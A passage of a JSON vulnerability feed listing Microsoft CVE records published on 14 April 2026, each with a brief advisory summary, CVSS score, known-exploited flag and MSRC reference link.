network.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33826"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33827","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an unauthorized attacker to execute code over a network.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33827"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33829","summary":"Exposure of sensitive information to an unauthorized actor in Windows Snipping Tool allows an unauthorized attacker to perform spoofing over a network.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33120","summary":"Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33120"],"published_time":"2026-04-14T18:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33822","summary":"Out-of-bounds read in Microsoft Office Word allows an 
unauthorized attacker to disclose information locally.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33822"],"published_time":"2026-04-14T18:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33824","summary":"Double free in Windows IKE Extension allows an unauthorized attacker to execute code over a network.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33824"],"published_time":"2026-04-14T18:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33103","summary":"Improper access control in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33103"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33104","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33104"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33114","summary":"Untrusted pointer dereference in 
Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33114"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33115","summary":"Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33115"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33116","summary":"Loop with unreachable exit condition ('infinite loop') in .NET, .NET Framework, Visual Studio allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33116"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33099","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33099"],"published_time":"2026-04-14T18:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33100","summary":"Use after free in Windows Ancillary 
Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33100"],"published_time":"2026-04-14T18:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33101","summary":"Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33101"],"published_time":"2026-04-14T18:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32226","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in .NET Framework allows an unauthorized attacker to deny service over a network.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32226"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33095","summary":"Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33095"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33096","summary":"Out-of-bounds read in 
Windows HTTP.sys allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33096"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33098","summary":"Use after free in Windows Container Isolation FS Filter Driver allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33098"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32221","summary":"Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32221"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32222","summary":"Untrusted pointer dereference in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32222"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32223","summary":"Heap-based buffer overflow in Windows USB Print Driver 
allows an unauthorized attacker to elevate privileges with a physical attack.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32223"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32224","summary":"Use after free in Windows Server Update Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32224"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32225","summary":"Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32225"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32217","summary":"Insertion of sensitive information into log file in Windows Kernel allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32217"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32218","summary":"Insertion of sensitive information into log file in 
Windows Kernel allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32218"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32219","summary":"Double free in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32219"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32220","summary":"Improper access control in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally.","cvss":4.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32220"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32214","summary":"Improper access control in Universal Plug and Play (upnp.dll) allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32214"],"published_time":"2026-04-14T18:17:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32215","summary":"Insertion of sensitive information 
into log file in Windows Kernel allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32215"],"published_time":"2026-04-14T18:17:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32216","summary":"Null pointer dereference in Windows Redirected Drive Buffering allows an authorized attacker to deny service locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32216"],"published_time":"2026-04-14T18:17:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32201","summary":"Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":true,"propose_action":"Microsoft SharePoint Server contains an improper input validation vulnerability that allows an unauthorized attacker to perform spoofing over a network.","ransomware_campaign":"Unknown","references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-32201"],"published_time":"2026-04-14T18:17:27","vendor":"microsoft","product":"sharepoint_server","version":null},{"cve_id":"CVE-2026-32202","summary":"Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a 
network.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32202"],"published_time":"2026-04-14T18:17:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32203","summary":"Stack-based buffer overflow in .NET and Visual Studio allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32203"],"published_time":"2026-04-14T18:17:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32212","summary":"Improper link resolution before file access ('link following') in Universal Plug and Play (upnp.dll) allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32212"],"published_time":"2026-04-14T18:17:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32196","summary":"Improper neutralization of input during web page generation ('cross-site scripting') in Windows Admin Center allows an unauthorized attacker to perform spoofing over a network.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32196"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32197","summary":"Use after free in Microsoft 
Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32197"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32198","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32198"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32199","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32199"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32200","summary":"Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32200"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32190","summary":"Use after free in Microsoft Office allows an unauthorized attacker to execute code 
locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32190"],"published_time":"2026-04-14T18:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32192","summary":"Deserialization of untrusted data in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32192"],"published_time":"2026-04-14T18:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32195","summary":"Stack-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32195"],"published_time":"2026-04-14T18:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32189","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32189"],"published_time":"2026-04-14T18:17:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32188","summary":"Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information 
locally.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32188"],"published_time":"2026-04-14T18:17:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32184","summary":"Deserialization of untrusted data in Microsoft High Performance Compute Pack (HPC) allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32184"],"published_time":"2026-04-14T18:17:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32176","summary":"Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32176"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32178","summary":"Improper neutralization of special elements in .NET allows an unauthorized attacker to perform spoofing over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32178"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32181","summary":"Improper privilege management in Microsoft Windows allows an 
authorized attacker to deny service locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32181"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32183","summary":"Improper neutralization of special elements used in a command ('command injection') in Windows Snipping Tool allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32183"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32165","summary":"Use after free in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32165"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32167","summary":"Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32167"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32168","summary":"Improper input 
validation in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32168"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32171","summary":"Insufficiently protected credentials in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32171"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32162","summary":"Acceptance of extraneous untrusted data with trusted data in Windows COM allows an unauthorized attacker to elevate privileges locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32162"],"published_time":"2026-04-14T18:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32163","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows User Interface Core allows an authorized attacker to elevate privileges 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32163"],"published_time":"2026-04-14T18:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32164","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32164"],"published_time":"2026-04-14T18:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32157","summary":"Use after free in Remote Desktop Client allows an unauthorized attacker to execute code over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32158","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32158"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32159","summary":"Concurrent 
execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32159"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32160","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32160"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32154","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32154"],"published_time":"2026-04-14T18:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32155","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32155"],"published_time":"2026-04-14T18:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32156","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an unauthorized attacker to execute code locally.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32156"],"published_time":"2026-04-14T18:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32150","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32150"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32151","summary":"Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to disclose information over a 